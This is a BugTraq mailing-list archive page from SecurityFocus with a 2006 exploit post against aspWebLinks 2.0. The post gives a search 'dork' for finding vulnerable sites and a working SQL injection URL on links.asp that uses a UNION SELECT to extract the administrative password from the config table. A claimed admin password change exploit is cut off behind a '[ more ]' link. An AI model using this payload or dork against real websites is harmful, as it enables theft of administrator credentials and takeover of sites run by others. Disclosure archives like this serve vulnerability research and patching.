Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change Exploit Jun 02 2006 07:15AM
ajannhwt hotmail com
<!--

# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection

# Author : ajann

# Dork : aspWebLinks 2.0

SQL INJECTION:

http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%2
0select+0,administrativepassword,0,0,0,0,0,0,0+from+config

-->...

[ more ]  





 

Privacy Statement
Copyright 2009, SecurityFocus